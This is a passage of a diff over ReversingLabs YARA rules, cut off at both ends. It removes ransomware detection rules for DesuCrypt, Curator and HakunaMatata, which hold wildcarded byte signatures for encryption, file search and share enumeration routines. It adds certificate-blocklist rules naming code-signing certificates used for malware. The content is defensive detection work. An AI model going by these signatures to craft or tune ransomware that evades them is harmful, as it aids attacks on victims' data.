CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ( all of ($delete_volumes_snapshots_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CodeDance Ltd" and (pe.signatures[i].serial=="00:ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" or pe.signatures[i].serial=="ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93") and 1654646400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Desucrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE { meta: - description = "Yara rule that detects DesuCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b9b3ce2b-f184-5bfa-8e1c-a7b996ac708a" - date = "2020-07-15" - modified = "2020-07-15" + id = "ccb36b8b-301d-5cc2-9c8e-4956b92c1116" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DesuCrypt.yara#L1-L93" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bd3ba8ea0fc16aad859a73628d0eda180d49298162fe239acf81c7c4e371eaad" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16376-L16394" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "390d074da09d8e5b4bb2a6f4157a5125474ab5c22de62729d4fc4075edade289" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DesuCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 - F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ?? - ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF - 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B - CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B - 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF - 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 - C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA - ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB - 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56 - 1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? - ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15 - ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 - C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? - 80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 - 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $encrypt_files = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? - ?? ?? 53 56 57 8B D9 89 54 24 ?? B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? BE ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? F3 A5 6A ?? 6A ?? 8D - 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 66 A5 50 6A ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B - E5 5D C3 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? 8D 84 24 ?? - ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F - 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 8D 44 24 ?? 50 FF 74 24 - ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? E9 ?? ?? ?? ?? 8B 43 ?? 8B 3D ?? ?? ?? ?? 50 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? - 50 6A ?? 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 51 BA - ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 - FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 83 7B ?? ?? 72 ?? 8B 1B FF 74 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? FF - 74 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 4C 24 - ?? 8B 44 24 ?? 5F 89 01 8B C6 8B 8C 24 ?? ?? ?? ?? 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 - 5D C3 - } - $enum_shares = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 75 ?? 8B 45 ?? 8D 4D ?? 51 50 - 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? - ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 0F 1F 40 ?? 33 DB 39 5D ?? 0F 8E ?? ?? ?? ?? 83 C7 ?? 66 90 F7 47 ?? ?? ?? ?? ?? 74 - ?? 8D 47 ?? 89 45 ?? 8B 06 8B 48 ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D 55 ?? 52 FF 50 - ?? E9 ?? ?? ?? ?? 8B 17 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8D 70 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C6 D1 F8 83 F8 ?? 77 ?? 8D 34 00 - 89 45 ?? 56 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 44 35 ?? EB ?? 52 C6 - 45 ?? ?? 8D 4D ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? - 50 8B 4E ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 83 C7 ?? - 3B 5D ?? 0F 8C ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 57 8D 45 ?? C7 - 45 ?? ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 FF 15 ?? - ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D - ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ($find_files and $encrypt_files and $enum_shares) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALISA L LIMITED" and (pe.signatures[i].serial=="00:aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" or pe.signatures[i].serial=="aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c") and 1549324800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Curator : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE { meta: - description = "Yara rule that detects Curator ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "401f1d64-afd9-55b1-8e87-b808d4679e9a" - date = "2021-04-22" - modified = "2021-04-22" + id = "d748bea4-8d2b-53b2-8184-ea0972ad9199" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Curator.yara#L1-L94" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8bd29195cea0f1194e27c48ed07c52100abb7dd3de2ef7f51a645d32c3527eb3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16396-L16414" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5c4afcd8ceb5cc2f1df2303183ede2081b86365eeee7d4e1319a8ed9a45bbf0b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Curator" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF 15 ?? ?? ?? - ?? 48 8B BD ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D ?? - ?? ?? ?? 41 8B DC 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? 45 33 F6 48 8B - 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 0F BE 8C 06 ?? ?? ?? ?? 45 0F - BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 8D - ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 4D 8D 76 ?? FF C3 41 83 C4 ?? 88 84 0D - ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 3B E0 7C - ?? 4C 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 E4 48 89 44 24 ?? 48 8D 95 ?? ?? - ?? ?? 45 33 C9 44 89 64 24 ?? 44 8B C3 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 4C 24 ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? ?? ?? - ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 8D 44 24 ?? - 48 89 44 24 ?? 45 33 C9 48 8D 44 24 ?? 89 9D ?? ?? ?? ?? 33 D2 48 89 44 24 ?? FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 41 8B DC 44 39 A5 ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 ?? ?? ?? - ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 4C 04 ?? E8 ?? ?? ?? ?? 48 8D 95 ?? - ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? ?? ?? 72 ?? 48 8B 8D ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? B9 - } - $encrypt_files_p2 = { - 48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 55 41 54 41 55 41 56 41 57 48 8D A8 ?? - ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 - 85 ?? ?? ?? ?? 45 33 E4 C7 44 24 ?? ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 89 25 ?? ?? ?? - ?? 48 8D 95 ?? ?? ?? ?? 44 89 25 ?? ?? ?? ?? 33 C9 44 89 25 ?? ?? ?? ?? 45 8B FC 4C - 89 25 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 - 48 8D 85 ?? ?? ?? ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 66 44 89 20 4C 8D 05 - ?? ?? ?? ?? 48 83 C0 ?? 4C 89 64 24 ?? 48 89 05 ?? ?? ?? ?? 45 33 C9 48 8D 05 ?? ?? - ?? ?? 44 89 64 24 ?? 33 D2 48 89 05 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9 - 44 8D 42 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 - ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 - 8B F0 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? - 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 - } - $find_files = { - 48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B - 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9 - BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? - 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24 - ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ?? - ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? - ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 - 5D C3 - } - $remote_connection = { - 44 0F B7 45 ?? 33 DB 48 8B 55 ?? 45 33 C9 48 89 5C 24 ?? 48 8B CE 89 5C 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? - ?? 80 7D ?? ?? B9 ?? ?? ?? ?? 4C 8B 45 ?? B8 ?? ?? ?? ?? 48 8B 55 ?? 0F 44 C8 48 89 - 5C 24 ?? 45 33 C9 89 4C 24 ?? 89 4D ?? 49 8B CE 48 89 5C 24 ?? 48 89 5C 24 ?? FF 15 - ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? - C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 4D ?? - ?? ?? ?? ?? 4C 8D 45 ?? 41 B9 ?? ?? ?? ?? 48 8B CB 41 8D 51 ?? FF 15 ?? ?? ?? ?? 4C - 8B 4D ?? 48 8B C7 48 F7 D8 48 8B D7 8B 45 ?? 48 8B CB 45 1B C0 89 44 24 ?? FF 15 ?? - ?? ?? ?? 85 C0 74 ?? 33 FF 83 65 ?? ?? 48 8D 55 ?? 45 33 C9 45 33 C0 48 8B CB FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 49 8B CF 03 D7 E8 ?? ?? ?? ?? 44 8B 45 ?? 4C 8D 4D - ?? 8B D7 48 8B CB 48 03 D0 4C 8B F8 FF 15 ?? ?? ?? ?? 8B 45 ?? 03 F8 EB ?? 8B 45 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE COMPANY OF WORDS LTD" and (pe.signatures[i].serial=="00:c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" or pe.signatures[i].serial=="c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31") and 1549324800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Hakunamatata : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE { meta: - description = "Yara rule that detects HakunaMatata ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "17438fcd-7a51-5fb6-96ac-38523bc1744f" - date = "2020-11-11" - modified = "2020-11-11" + id = "0389d5ba-4535-5277-9c77-bd178e66417f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.HakunaMatata.yara#L1-L373" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e363ff93fce286d60a3f5ea20ba3ec03564b7a5321c3f6448cc82187f23e8a9f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16416-L16434" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a7f18d0028cbc0001a196bc915b7881244a5833dd65f96dd7d2e8ab1b0622e0c" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HakunaMatata" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? - 85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 14 24 89 C1 E8 ?? - ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? - ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B - 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 - EC ?? 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B - 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 54 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? - 01 D0 01 C0 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? - ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 - A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8B 45 ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? - 39 C8 76 ?? 89 C8 89 DA 89 45 ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? - 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? - 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 - 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C6 8B 45 ?? 89 C1 BB - ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 CF 31 C7 89 7D ?? 89 DF 31 D7 89 7D ?? 8B 45 ?? 0B - 45 ?? 85 C0 0F 94 C0 0F B6 C8 8B 55 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 - F0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 - A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 - 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? - 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 - 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? - 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? - ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 F6 ?? 89 75 ?? 89 D0 80 F4 ?? 89 - 45 ?? 8B 55 ?? 8B 4D ?? 89 C8 09 D0 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? - 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 - 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? - ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 - EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5F 5D C2 - } - $encrypt_files_2 = { - 55 89 E5 56 53 81 EC ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 89 85 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? 